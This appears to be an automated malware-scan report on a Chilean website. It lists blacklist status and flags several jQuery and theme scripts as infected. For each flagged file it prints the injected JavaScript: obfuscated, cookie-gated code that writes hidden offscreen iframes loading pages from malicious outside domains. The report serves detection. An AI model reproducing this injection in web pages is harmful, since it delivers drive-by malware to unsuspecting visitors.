Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mfdsa.cl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mfdsa.cl/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.mfdsa.cl/ | 200 OK Content-Length: 17465 Content-Type: text/html | clean |
http://www.macrofood.cl/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 100547 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: helpful.rothgroupinc.com ...[2766 bytes skipped]... ument.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return match ? decodeURIComponent(match[1]) : undefined; } if (!tine_jocker()) { var cookie = getCookie('coloco17ayeu'+'venaisue17a'); if (cookie == undefined) { setCookie('coloco17ayeu'+'venaisue17a', true, 259200); document.write('<'+'if'+'r'+'a'+'m'+'e s'+'r'+'c'+'='+'"http://helpful.rothgroupinc.com/kuykghncxvbdgsgh12.html" style="posi'+'tion'+':'+'abso'+'lute'+';'+'left'+':'+'-'+'1160'+'px'+';'+'top'+':'+'-'+'1160'+'px'+';'+'" height="129" width="129">'+'</'+'i'+'fr'+'a'+'m'+'e'+'>'); } }; })(); !function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?wind ...[103145 bytes skipped]... Decoded script: <iframe src="http://gabro.superbooter.co.uk/jstfhdgseyrtdkygfnrtsj12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe><iframe src="http://helpful.rothgroupinc.com/kuykghncxvbdgsgh12.html" style="position:absolute;left:-1160px;top:-1160px;" height="129" width="129"></iframe> | ||
http://www.macrofood.cl/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 11345 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: helpful.rothgroupinc.com ...[2766 bytes skipped]... ument.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return match ? decodeURIComponent(match[1]) : undefined; } if (!tine_jocker()) { var cookie = getCookie('coloco17ayeu'+'venaisue17a'); if (cookie == undefined) { setCookie('coloco17ayeu'+'venaisue17a', true, 259200); document.write('<'+'if'+'r'+'a'+'m'+'e s'+'r'+'c'+'='+'"http://helpful.rothgroupinc.com/kuykghncxvbdgsgh12.html" style="posi'+'tion'+':'+'abso'+'lute'+';'+'left'+':'+'-'+'1160'+'px'+';'+'top'+':'+'-'+'1160'+'px'+';'+'" height="129" width="129">'+'</'+'i'+'fr'+'a'+'m'+'e'+'>'); } }; })(); jQuery.migrateMute===void 0&&(jQuery.migrateMute=!0),function(e,t,n){function r(n){var r=t.console;i[n]||(i[n]=!0,e.migrateWarnings.push(n),r&&r.warn&&!e.migrateMute&&(r.warn("JQMIGRATE: "+n),e.migrateTrace&&a ...[7369 bytes skipped]... Decoded script: <iframe src="http://gabro.superbooter.co.uk/jstfhdgseyrtdkygfnrtsj12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe><iframe src="http://helpful.rothgroupinc.com/kuykghncxvbdgsgh12.html" style="position:absolute;left:-1160px;top:-1160px;" height="129" width="129"></iframe> | ||
http://www.macrofood.cl/wp-content/themes/MacroFood/epanel/shortcodes/js/et_shortcodes_frontend.js?ver=1.6 | 200 OK Content-Length: 8692 Content-Type: application/x-javascript | clean |
http://www.google.com/jsapi | 200 OK Content-Length: 24546 Content-Type: text/javascript | clean |
http://x.translateth.is/translate-this.js | 200 OK Content-Length: 18416 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js | 200 OK Content-Length: 185442 Content-Type: text/javascript | clean |
http://www.macrofood.cl/wp-content/themes/MacroFood/js/jquery.cycle.all.min.js | 200 OK Content-Length: 32095 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: helpful.rothgroupinc.com ...[2766 bytes skipped]... ument.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return match ? decodeURIComponent(match[1]) : undefined; } if (!tine_jocker()) { var cookie = getCookie('coloco17ayeu'+'venaisue17a'); if (cookie == undefined) { setCookie('coloco17ayeu'+'venaisue17a', true, 259200); document.write('<'+'if'+'r'+'a'+'m'+'e s'+'r'+'c'+'='+'"http://helpful.rothgroupinc.com/kuykghncxvbdgsgh12.html" style="posi'+'tion'+':'+'abso'+'lute'+';'+'left'+':'+'-'+'1160'+'px'+';'+'top'+':'+'-'+'1160'+'px'+';'+'" height="129" width="129">'+'</'+'i'+'fr'+'a'+'m'+'e'+'>'); } }; })(); ;(function($){var ver="2.65";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=funct ...[27273 bytes skipped]... Decoded script: <iframe src="http://gabro.superbooter.co.uk/jstfhdgseyrtdkygfnrtsj12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe><iframe src="http://helpful.rothgroupinc.com/kuykghncxvbdgsgh12.html" style="position:absolute;left:-1160px;top:-1160px;" height="129" width="129"></iframe> | ||
http://www.macrofood.cl/wp-content/themes/MacroFood/js/jquery.easing.1.3.js | 200 OK Content-Length: 12488 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: helpful.rothgroupinc.com ...[2766 bytes skipped]... ument.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return match ? decodeURIComponent(match[1]) : undefined; } if (!tine_jocker()) { var cookie = getCookie('coloco17ayeu'+'venaisue17a'); if (cookie == undefined) { setCookie('coloco17ayeu'+'venaisue17a', true, 259200); document.write('<'+'if'+'r'+'a'+'m'+'e s'+'r'+'c'+'='+'"http://helpful.rothgroupinc.com/kuykghncxvbdgsgh12.html" style="posi'+'tion'+':'+'abso'+'lute'+';'+'left'+':'+'-'+'1160'+'px'+';'+'top'+':'+'-'+'1160'+'px'+';'+'" height="129" width="129">'+'</'+'i'+'fr'+'a'+'m'+'e'+'>'); } }; })(); jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, < ...[5021 bytes skipped]... Decoded script: <iframe src="http://gabro.superbooter.co.uk/jstfhdgseyrtdkygfnrtsj12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe><iframe src="http://helpful.rothgroupinc.com/kuykghncxvbdgsgh12.html" style="position:absolute;left:-1160px;top:-1160px;" height="129" width="129"></iframe> | ||
http://www.macrofood.cl/wp-content/themes/MacroFood/js/superfish.js | 200 OK Content-Length: 4145 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: helpful.rothgroupinc.com ...[2766 bytes skipped]... ument.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return match ? decodeURIComponent(match[1]) : undefined; } if (!tine_jocker()) { var cookie = getCookie('coloco17ayeu'+'venaisue17a'); if (cookie == undefined) { setCookie('coloco17ayeu'+'venaisue17a', true, 259200); document.write('<'+'if'+'r'+'a'+'m'+'e s'+'r'+'c'+'='+'"http://helpful.rothgroupinc.com/kuykghncxvbdgsgh12.html" style="posi'+'tion'+':'+'abso'+'lute'+';'+'left'+':'+'-'+'1160'+'px'+';'+'top'+':'+'-'+'1160'+'px'+';'+'" height="129" width="129">'+'</'+'i'+'fr'+'a'+'m'+'e'+'>'); } }; })(); Decoded script: <iframe src="http://gabro.superbooter.co.uk/jstfhdgseyrtdkygfnrtsj12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe><iframe src="http://helpful.rothgroupinc.com/kuykghncxvbdgsgh12.html" style="position:absolute;left:-1160px;top:-1160px;" height="129" width="129"></iframe> | ||
http://www.macrofood.cl/wp-content/themes/MacroFood/js/jquery.lavalamp.1.3.3-min.js | 200 OK Content-Length: 13337 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: helpful.rothgroupinc.com ...[2766 bytes skipped]... ument.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return match ? decodeURIComponent(match[1]) : undefined; } if (!tine_jocker()) { var cookie = getCookie('coloco17ayeu'+'venaisue17a'); if (cookie == undefined) { setCookie('coloco17ayeu'+'venaisue17a', true, 259200); document.write('<'+'if'+'r'+'a'+'m'+'e s'+'r'+'c'+'='+'"http://helpful.rothgroupinc.com/kuykghncxvbdgsgh12.html" style="posi'+'tion'+':'+'abso'+'lute'+';'+'left'+':'+'-'+'1160'+'px'+';'+'top'+':'+'-'+'1160'+'px'+';'+'" height="129" width="129">'+'</'+'i'+'fr'+'a'+'m'+'e'+'>'); } }; })(); (function(jQuery) { jQuery.fn.lavaLamp = function(o) { o = jQuery.extend({ fx: 'swing', speed: 500, click: function(){return true}, startItem: 'no', autoReturn: true, re ...[3179 bytes skipped]... Decoded script: <iframe src="http://gabro.superbooter.co.uk/jstfhdgseyrtdkygfnrtsj12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe><iframe src="http://helpful.rothgroupinc.com/kuykghncxvbdgsgh12.html" style="position:absolute;left:-1160px;top:-1160px;" height="129" width="129"></iframe> | ||
http://www.macrofood.cl/wp-content/themes/MacroFood/epanel/page_templates/js/fancybox/jquery.fancybox-1.2.6.pack.js?ver=1.3.2 | 200 OK Content-Length: 9537 Content-Type: application/x-javascript | clean |
http://www.macrofood.cl/wp-content/themes/MacroFood/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 | 200 OK Content-Length: 3833 Content-Type: application/x-javascript | clean |
http://www.mfdsa.cl/test404page.js | 404 Not Found Content-Length: 19288 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mfdsa.cl
Result:
GET / HTTP/1.1
Host: mfdsa.cl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: mfdsa.cl
Referer: http://www.google.com/search?q=mfdsa.cl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mfdsa.cl
Referer: http://www.google.com/search?q=mfdsa.cl
Result:
The result is similar to the first query. There are no suspicious redirects found.